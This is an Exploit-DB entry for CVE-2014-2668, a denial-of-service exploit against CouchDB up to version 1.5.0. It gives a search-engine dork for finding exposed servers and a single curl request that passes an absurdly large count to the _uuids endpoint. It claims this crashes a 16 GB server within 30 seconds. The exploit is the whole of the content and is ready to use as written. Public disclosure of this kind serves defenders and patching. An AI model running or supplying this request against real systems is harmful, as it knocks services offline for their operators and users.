Couchdb 1.5.0 - uuids DoS Exploit

2014-03-26T00:00:00
ID EDB-ID:32519
Type exploitdb
Reporter Krusty Hack
Modified 2014-03-26T00:00:00

Description

Couchdb 1.5.0 - uuids DoS Exploit. CVE-2014-2668. Dos exploits for multiple platform

                                        
                                            # Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0

HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999

TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.